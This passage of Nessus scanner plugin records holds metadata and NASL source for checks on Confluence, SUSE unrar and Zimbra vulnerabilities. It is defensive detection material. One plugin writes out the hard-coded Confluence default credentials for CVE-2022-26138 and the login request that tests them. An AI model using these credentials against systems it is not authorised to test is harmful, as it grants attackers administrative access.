}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:33:27", "description": "The remote confluence web application uses a known set of hard-coded default credentials of the 'Questions for Confluence' marketplace application. An attacker can exploit this to gain administrative access to the remote host.", "cvss3": {}, "published": "2022-08-12T00:00:00", "type": "nessus", "title": "Questions for Confluence App Default Credentials (CVE-2022-26138)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26138.NASL", "href": "https://www.tenable.com/plugins/nessus/164091", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164091);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2022-26138\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/19\");\n\n script_name(english:\"Questions for Confluence App Default Credentials (CVE-2022-26138)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The application hosted on the remote web server uses a default set of known credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote confluence web application uses a known set of hard-coded default credentials of the\n'Questions for Confluence' marketplace application. An attacker can exploit this to gain \nadministrative access to the remote host.\");\n # https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56edf34e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the application's default credentials.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26138\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('url_func.inc');\ninclude('vcf.inc');\ninclude('debug.inc');\n\nvar app_name = 'confluence';\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvar url = build_url(port:port, qs:app_info['path']);\n\n##\n# Try to authenticate with default disabledsystemuser/disabled1system1user6708 creds\n#\n# @param port - the port the application exists on\n# @return TRUE for successful authentication, otherwise FALSE\n##\nfunction try_default_creds(port)\n{\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[trying default creds]');\n var res, post;\n post = 'os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Findex.action';\n # Authenticate\n res = http_send_recv3(\n port : port,\n method : 'POST',\n item : '/dologin.action',\n data : post,\n content_type : \"application/x-www-form-urlencoded\",\n exit_on_fail : TRUE\n );\n\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'Attempted to login with: ' + http_last_sent_request());\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'Response was: ' + obj_rep(res));\n if ('HTTP/1.1 302' >< res[0] && 'X-Seraph-LoginReason: OK' >< res[1])\n {\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[login confirmed][ ' + res[0] + '][' + res[1] + ']');\n return TRUE;\n }\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[login failed][ ' + res[0] + '][' + res[1] + ']');\n return FALSE;\n}\n\nvar can_auth = try_default_creds(port:port);\n\nvar report = NULL;\nif (can_auth)\n{\n report = 'Nessus was able to gain access to the remote confluence app\\n' +\n 'using the following set of credentials:\\n' +\n '\\n Username : disabledsystemuser' +\n '\\n Password : disabled1system1user6708';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, url);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:13", "description": "The remote SUSE Linux SLES12 host has packages installed that are affected by a vulnerability as referenced in the SUSE- SU-2022:1760-1 advisory.\n\n - RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected. (CVE-2022-30333)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-20T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : unrar (SUSE-SU-2022:1760-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30333"], "modified": "2023-03-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libunrar-devel", "p-cpe:/a:novell:suse_linux:libunrar5_6_1", "p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2022-1760-1.NASL", "href": "https://www.tenable.com/plugins/nessus/161392", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:1760-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161392);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/10\");\n\n script_cve_id(\"CVE-2022-30333\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:1760-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n\n script_name(english:\"SUSE SLES12 Security Update : unrar (SUSE-SU-2022:1760-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES12 host has packages installed that are affected by a vulnerability as referenced in the SUSE-\nSU-2022:1760-1 advisory.\n\n - RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract\n (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and\n Android RAR are unaffected. (CVE-2022-30333)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1199349\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-May/011102.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?418ef299\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-30333\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libunrar-devel, libunrar5_6_1 and / or unrar packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30333\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'UnRAR Path Traversal in Zimbra (CVE-2022-30333)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libunrar-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libunrar5_6_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES12', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES12 SP5\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libunrar-devel-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'libunrar5_6_1-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'unrar-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sles-release-12.5']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libunrar-devel / libunrar5_6_1 / unrar');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:34:10", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities, including the following:\n\n - An issue was discovered in ProxyServlet.java in the /proxy servlet in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. The value of the X-Forwarded-Host header overwrites the value of the Host header in proxied requests. The value of X-Forwarded-Host header is not checked against the whitelist of hosts that ZCS is allowed to proxy to (the zimbraProxyAllowedDomains setting). (CVE-2022-37041)\n\n - Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925. (CVE-2022-37042)\n\n - An issue was discovered in the webmail component in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. When using preauth, CSRF tokens are not checked on some POST endpoints. Thus, when an authenticated user views an attacker-controlled page, a request will be sent to the application that appears to be intended. The CSRF token is omitted from the request, but the request still succeeds. (CVE-2022-37043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-23T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 33 / 9.0.0 < 9.0.0 Patch 26 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2068", "CVE-2022-24407", "CVE-2022-27925", "CVE-2022-37041", "CVE-2022-37042", "CVE-2022-37043"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_9_0_0_P26.NASL", "href": "https://www.tenable.com/plugins/nessus/164341", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164341);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\n \"CVE-2022-2068\",\n \"CVE-2022-24407\",\n \"CVE-2022-37041\",\n \"CVE-2022-37042\",\n \"CVE-2022-37043\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 33 / 9.0.0 < 9.0.0 Patch 26 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities,\nincluding the following:\n\n - An issue was discovered in ProxyServlet.java in the /proxy servlet in Zimbra Collaboration Suite (ZCS)\n 8.8.15 and 9.0. The value of the X-Forwarded-Host header overwrites the value of the Host header in\n proxied requests. The value of X-Forwarded-Host header is not checked against the whitelist of hosts that\n ZCS is allowed to proxy to (the zimbraProxyAllowedDomains setting). (CVE-2022-37041)\n\n - Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive\n and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can\n upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this\n issue exists because of an incomplete fix for CVE-2022-27925. (CVE-2022-37042)\n\n - An issue was discovered in the webmail component in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. When\n using preauth, CSRF tokens are not checked on some POST endpoints. Thus, when an authenticated user views\n an attacker-controlled page, a request will be sent to the application that appears to be intended. The\n CSRF token is omitted from the request, but the request still succeeds. (CVE-2022-37043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cisa.gov/uscert/ncas/alerts/aa22-228a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.8.15 Patch 33, 9.0.0 Patch 26, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2068\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-37042\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'8.8', 'max_version':'8.8.15', 'fixed_display':'8.8.15 Patch 33', 'Patch':'33'},\n {'min_version':'9.0', 'max_version':'9.0.0', 'fixed_display':'9.0.0 Patch 26', 'Patch':'26'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xsrf':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T20:34:33", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities, including the following:\n\n - A vulnerability that allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries. (CVE-2022-27924)\n\n - Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal. (CVE-2022-27925)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-13T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 31 / 9.0.0 < 9.0.0 Patch 24 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21702", "CVE-2021-39275", "CVE-2021-40438", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-27926"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_9_0_0_P24.NASL", "href": "https://www.tenable.com/plugins/nessus/163072", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163072);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21702\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2022-27924\",\n \"CVE-2022-27925\",\n \"CVE-2022-27926\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/04/24\");\n script_xref(name:\"IAVA\", value:\"2022-A-0268-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 31 / 9.0.0 < 9.0.0 Patch 24 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities,\nincluding the following:\n\n - A vulnerability that allows an unauthenticated attacker to inject arbitrary memcache commands into a\n targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached\n entries. (CVE-2022-27924)\n\n - Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and\n extracts files from it. An authenticated user with administrator rights has the ability to upload\n arbitrary files to the system, leading to directory traversal. (CVE-2022-27925)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.8.15 Patch 31, 9.0.0 Patch 24, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-39275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'8.8', 'max_version':'8.8.15', 'fixed_display':'8.8.15 Patch 31', 'Patch':'31'},\n {'min_version':'9.0', 'max_version':'9.0.0', 'fixed_display':'9.0.0 Patch 24', 'Patch':'24'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:40:01", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-01-04T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CONFSERVER-79016)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-07T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL", "href": "https://www.tenable.com/plugins/nessus/169509", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(169509);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/07\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0023\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CONFSERVER-79016)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-79016\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 